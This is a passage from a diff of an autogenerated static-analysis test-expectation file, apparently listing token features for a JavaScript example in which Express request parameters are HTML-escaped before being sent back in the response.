autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:15:67:24 | req.params | enclosingFunctionBody | req res url req params id res send escapeHtml1 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:15:67:24 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:15:67:24 | req.params | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:15:67:27 | req.params.id | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:15:67:27 | req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:15:67:27 | req.params.id | enclosingFunctionBody | req res url req params id res send escapeHtml1 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:15:67:27 | req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:15:67:27 | req.params.id | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:19:67:24 | params | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:19:67:24 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:19:67:24 | params | enclosingFunctionBody | req res url req params id res send escapeHtml1 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:19:67:24 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:19:67:24 | params | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:26:67:27 | id | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:26:67:27 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:26:67:27 | id | enclosingFunctionBody | req res url req params id res send escapeHtml1 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:26:67:27 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:67:26:67:27 | id | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:3:69:5 | res | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:3:69:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:3:69:5 | res | enclosingFunctionBody | req res url req params id res send escapeHtml1 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:3:69:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:3:69:5 | res | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:3:69:10 | res.send | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:3:69:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:3:69:10 | res.send | enclosingFunctionBody | req res url req params id res send escapeHtml1 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:3:69:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:3:69:10 | res.send | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:3:69:28 | exceptional return of res.sen ... 1(url)) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:3:69:28 | exceptional return of res.sen ... 1(url)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:3:69:28 | exceptional return of res.sen ... 1(url)) | enclosingFunctionBody | req res url req params id res send escapeHtml1 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:3:69:28 | exceptional return of res.sen ... 1(url)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:3:69:28 | exceptional return of res.sen ... 1(url)) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:3:69:28 | res.sen ... 1(url)) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:3:69:28 | res.sen ... 1(url)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:3:69:28 | res.sen ... 1(url)) | enclosingFunctionBody | req res url req params id res send escapeHtml1 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:3:69:28 | res.sen ... 1(url)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:3:69:28 | res.sen ... 1(url)) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:7:69:10 | send | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:7:69:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:7:69:10 | send | enclosingFunctionBody | req res url req params id res send escapeHtml1 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:7:69:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:7:69:10 | send | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:12:69:22 | escapeHtml1 | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:12:69:22 | escapeHtml1 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:12:69:22 | escapeHtml1 | enclosingFunctionBody | req res url req params id res send escapeHtml1 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:12:69:22 | escapeHtml1 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:12:69:22 | escapeHtml1 | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:12:69:27 | escapeHtml1(url) | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:12:69:27 | escapeHtml1(url) | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:12:69:27 | escapeHtml1(url) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | @@ -21260,6 +141748,141 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:12:69:27 | escapeHtml1(url) | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:12:69:27 | escapeHtml1(url) | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:12:69:27 | escapeHtml1(url) | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:12:69:27 | exceptional return of escapeHtml1(url) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:12:69:27 | exceptional return of escapeHtml1(url) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:12:69:27 | exceptional return of escapeHtml1(url) | enclosingFunctionBody | req res url req params id res send escapeHtml1 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:12:69:27 | exceptional return of escapeHtml1(url) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:69:12:69:27 | exceptional return of escapeHtml1(url) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:72:7:72:21 | matchHtmlRegExp | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:72:7:72:21 | matchHtmlRegExp | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:72:7:72:21 | matchHtmlRegExp | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:72:7:72:21 | matchHtmlRegExp | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:72:7:72:33 | matchHt ... "'&<>]/ | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:72:7:72:33 | matchHt ... "'&<>]/ | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:72:7:72:33 | matchHt ... "'&<>]/ | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:72:7:72:33 | matchHtmlRegExp | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:72:7:72:33 | matchHtmlRegExp | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:72:7:72:33 | matchHtmlRegExp | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:72:25:72:33 | /["'&<>]/ | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:72:25:72:33 | /["'&<>]/ | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:72:25:72:33 | /["'&<>]/ | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:1:73:0 | matchHtmlRegExp | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:1:73:0 | matchHtmlRegExp | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:1:73:0 | matchHtmlRegExp | enclosingFunctionBody | string str string match matchHtmlRegExp exec str match str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:1:73:0 | matchHtmlRegExp | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:1:73:0 | matchHtmlRegExp | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:1:73:0 | this | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:1:73:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:1:73:0 | this | enclosingFunctionBody | string str string match matchHtmlRegExp exec str match str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:1:73:0 | this | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:1:73:0 | this | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:1:80:1 | 'arguments' object of function escapeHtml2 | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:1:80:1 | 'arguments' object of function escapeHtml2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:1:80:1 | 'arguments' object of function escapeHtml2 | enclosingFunctionBody | string str string match matchHtmlRegExp exec str match str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:1:80:1 | 'arguments' object of function escapeHtml2 | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:1:80:1 | 'arguments' object of function escapeHtml2 | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:1:80:1 | exceptional return of function escapeHtml2 | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:1:80:1 | exceptional return of function escapeHtml2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:1:80:1 | exceptional return of function escapeHtml2 | enclosingFunctionBody | string str string match matchHtmlRegExp exec str match str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:1:80:1 | exceptional return of function escapeHtml2 | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:1:80:1 | exceptional return of function escapeHtml2 | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:1:80:1 | functio ... }\\n} | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:1:80:1 | functio ... }\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:1:80:1 | functio ... }\\n} | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:1:80:1 | return of function escapeHtml2 | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:1:80:1 | return of function escapeHtml2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:1:80:1 | return of function escapeHtml2 | enclosingFunctionBody | string str string match matchHtmlRegExp exec str match str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:1:80:1 | return of function escapeHtml2 | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:1:80:1 | return of function escapeHtml2 | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:10:73:20 | escapeHtml2 | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:10:73:20 | escapeHtml2 | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:10:73:20 | escapeHtml2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:10:73:20 | escapeHtml2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:10:73:20 | escapeHtml2 | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:10:73:20 | escapeHtml2 | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:10:73:20 | escapeHtml2 | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:23:73:28 | string | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:23:73:28 | string | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:23:73:28 | string | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:23:73:28 | string | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:23:73:28 | string | enclosingFunctionBody | string str string match matchHtmlRegExp exec str match str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:23:73:28 | string | enclosingFunctionBody | string str string match matchHtmlRegExp exec str match str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:23:73:28 | string | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:23:73:28 | string | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:23:73:28 | string | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:73:23:73:28 | string | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:74:11:74:13 | str | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:74:11:74:13 | str | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:74:11:74:13 | str | enclosingFunctionBody | string str string match matchHtmlRegExp exec str match str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:74:11:74:13 | str | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:74:11:74:13 | str | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:74:11:74:27 | str | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:74:11:74:27 | str | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:74:11:74:27 | str | enclosingFunctionBody | string str string match matchHtmlRegExp exec str match str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:74:11:74:27 | str | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:74:11:74:27 | str | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:74:11:74:27 | str = '' + string | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:74:11:74:27 | str = '' + string | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:74:11:74:27 | str = '' + string | enclosingFunctionBody | string str string match matchHtmlRegExp exec str match str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:74:11:74:27 | str = '' + string | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:74:11:74:27 | str = '' + string | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:74:17:74:18 | '' | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:74:17:74:18 | '' | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:74:17:74:18 | '' | enclosingFunctionBody | string str string match matchHtmlRegExp exec str match str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:74:17:74:18 | '' | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:74:17:74:18 | '' | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:74:17:74:18 | '' | stringConcatenatedWith | -endpoint- string | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:74:17:74:27 | '' + string | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:74:17:74:27 | '' + string | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:74:17:74:27 | '' + string | enclosingFunctionBody | string str string match matchHtmlRegExp exec str match str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:74:17:74:27 | '' + string | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:74:17:74:27 | '' + string | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:74:22:74:27 | string | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:74:22:74:27 | string | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:74:22:74:27 | string | enclosingFunctionBody | string str string match matchHtmlRegExp exec str match str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:74:22:74:27 | string | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:74:22:74:27 | string | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:74:22:74:27 | string | stringConcatenatedWith | '' -endpoint- | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:11:75:15 | match | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:11:75:15 | match | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:11:75:15 | match | enclosingFunctionBody | string str string match matchHtmlRegExp exec str match str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:11:75:15 | match | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:11:75:15 | match | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:11:75:43 | match | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:11:75:43 | match | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:11:75:43 | match | enclosingFunctionBody | string str string match matchHtmlRegExp exec str match str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:11:75:43 | match | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:11:75:43 | match | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:11:75:43 | match = ... ec(str) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:11:75:43 | match = ... ec(str) | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:11:75:43 | match = ... ec(str) | enclosingFunctionBody | string str string match matchHtmlRegExp exec str match str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:11:75:43 | match = ... ec(str) | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:11:75:43 | match = ... ec(str) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:19:75:33 | matchHtmlRegExp | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:19:75:33 | matchHtmlRegExp | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:19:75:33 | matchHtmlRegExp | enclosingFunctionBody | string str string match matchHtmlRegExp exec str match str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:19:75:33 | matchHtmlRegExp | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:19:75:33 | matchHtmlRegExp | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:19:75:38 | matchHtmlRegExp.exec | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:19:75:38 | matchHtmlRegExp.exec | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:19:75:38 | matchHtmlRegExp.exec | enclosingFunctionBody | string str string match matchHtmlRegExp exec str match str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:19:75:38 | matchHtmlRegExp.exec | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:19:75:38 | matchHtmlRegExp.exec | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:19:75:43 | exceptional return of matchHt ... ec(str) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:19:75:43 | exceptional return of matchHt ... ec(str) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:19:75:43 | exceptional return of matchHt ... ec(str) | enclosingFunctionBody | string str string match matchHtmlRegExp exec str match str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:19:75:43 | exceptional return of matchHt ... ec(str) | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:19:75:43 | exceptional return of matchHt ... ec(str) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:19:75:43 | matchHt ... ec(str) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:19:75:43 | matchHt ... ec(str) | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:19:75:43 | matchHt ... ec(str) | enclosingFunctionBody | string str string match matchHtmlRegExp exec str match str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:19:75:43 | matchHt ... ec(str) | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:19:75:43 | matchHt ... ec(str) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:35:75:38 | exec | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:35:75:38 | exec | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:35:75:38 | exec | enclosingFunctionBody | string str string match matchHtmlRegExp exec str match str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:35:75:38 | exec | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:35:75:38 | exec | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:40:75:42 | str | CalleeFlexibleAccessPath | matchHtmlRegExp.exec | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:40:75:42 | str | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:40:75:42 | str | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | @@ -21268,6 +141891,36 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:40:75:42 | str | enclosingFunctionName | escapeHtml2 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:40:75:42 | str | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:75:40:75:42 | str | receiverName | matchHtmlRegExp | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:77:9:77:14 | !match | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:77:9:77:14 | !match | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:77:9:77:14 | !match | enclosingFunctionBody | string str string match matchHtmlRegExp exec str match str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:77:9:77:14 | !match | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:77:9:77:14 | !match | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:77:10:77:14 | match | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:77:10:77:14 | match | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:77:10:77:14 | match | enclosingFunctionBody | string str string match matchHtmlRegExp exec str match str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:77:10:77:14 | match | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:77:10:77:14 | match | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:78:16:78:18 | str | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:78:16:78:18 | str | 